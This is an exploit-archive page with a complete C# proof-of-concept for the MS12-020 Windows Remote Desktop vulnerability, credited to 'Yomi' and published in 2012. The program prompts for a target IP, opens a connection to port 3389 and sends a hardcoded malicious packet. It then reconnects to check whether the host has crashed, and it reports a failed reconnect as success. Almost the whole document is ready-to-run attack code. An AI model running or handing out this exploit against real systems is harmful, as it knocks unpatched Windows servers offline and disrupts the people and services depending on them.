Microsoft windows remote desktop PoC C# Exploit



EKU-ID: 2879 CVE: OSVDB-ID:
Author: Yomi Published: 2012-12-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


//ms12-020 "chinese shit" PoC
//Tested On Win7 Ultimate & Win 2008 Server & Win 2003 Serrver R2
//C# Coded By Yomi :D

using System;
using System.Net;
using System.Net.Sockets;

namespace RDP_PoC_Exploit
{
    class Program
    {
        public static readonly string str_shell =
"030000130ee00000" +"0000000100080000" +"000000030001d602" +"f0807f6582019404" +"01010401010101ff" +"3019020400000000" +
"0204000000020204" +"0000000002040000" +"0001020400000000" +"0204000000010202" +"ffff020400000002" +"3019020400000001" +
"0204000000010204" +"0000000102040000" +"0001020400000000" +"0204000000010202" +"0420020400000002" +"301c0202ffff0202" +
"fc170202ffff0204" +"0000000102040000" +"0000020400000001" +"0202ffff02040000" +"0002048201330005" +"00147c0001812a00" +
"0800100001c00044" +"756361811c01c0d8" +"00040008008002e0" +"0101ca03aa090400" +"00ce0e000048004f" +"0053005400000000" +
"0000000000000000" +"0000000000000000" +"0000000000040000" +"00000000000c0000" +"0000000000000000" +"0000000000000000" +
"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +
"0001ca0100000000" +"0010000700010030" +"0030003000300030" +"002d003000300030" +"002d003000300030" +"0030003000300030" +
"002d003000300030" +"0030003000000000" +"0000000000000000" +"0000000000000000" +"000000000004c00c" +"000d000000000000" +
"0002c00c001b0000" +"000000000003c02c" +"0003000000726470" +"6472000000000080" +"80636c6970726472" +"000000a0c0726470" +
"736e640000000000" +"c00300000c02f080" +"0401000100030000" +"0802f08028030000" +"0c02f08038000603" +"ef0300000c02f080" +
"38000603eb030000" +"0c02f08038000603" +"ec0300000c02f080" +"38000603ed030000" +"0c02f08038000603" +"ee0300000b06d000" +
"00123400";
           
        static void Main(string[] args)
        {
            Console.WriteLine("Enter Remote IP : <192.168.1.1> <Enter To Start :D>");
            string str_IP = Console.ReadLine();
			
			Exploit_it(str_IP);
			
        }

        static private void Exploit_it(string IP)
        {
            try
            {
                Socket _soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
                IPAddress remoteIPAddress = IPAddress.Parse(IP);
                IPEndPoint remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
                _soc.Connect(remoteEndPoint);
                Console.WriteLine(".............. Creating Paylod ");
                byte[] buff = HexString2Bytes(str_shell);
                Console.WriteLine(".............. Sending Payload ");
                _soc.Send(buff);
                Console.WriteLine(".............. Payoad Sent ! ");
                Console.WriteLine(".............. Reconnecting To Remote Target ! ");
                _soc.Disconnect(true);

                try
                {
					
						Socket re_soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
						IPAddress re_remoteIPAddress = IPAddress.Parse(IP);
						IPEndPoint re_remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
						re_soc.Connect(re_remoteEndPoint);
						Console.WriteLine(".............. Remote Host Responding ! :( ");
						Console.WriteLine(".............. Exploit Faild ! :( ");
					
                }
                catch (System.Net.Sockets.SocketException Exp)
                {
                    Console.WriteLine(".............. Remote Host Not Response ! :D");
                    Console.WriteLine(".............. Exploit Success !! \r\nSocket Error : [ " + Exp.Message + " ]");
                }

                Console.WriteLine(".............. Exploit Done ! \r\n.............. Check Result Of It !");
            }
            catch (System.Net.Sockets.SocketException se)
            {
                Console.WriteLine(".............. Exploit Faild !");
                Console.WriteLine("Socket Error : [ " + se.Message + " ]");
            }
        }

        static private byte[] HexString2Bytes(string hexString)
        {
            int len = hexString.Length;
            if (len % 2 == 1) throw new Exception("Invalid  HEX String Length !");
            int len_half = len / 2;
            byte[] arr_b = new byte[len_half];
            for (int i = 0; i != len_half; i++)
            {
                arr_b[i] = (byte)Int32.Parse(hexString.Substring(i * 2, 2), System.Globalization.NumberStyles.HexNumber);
            }
            return arr_b;
        }
    }
}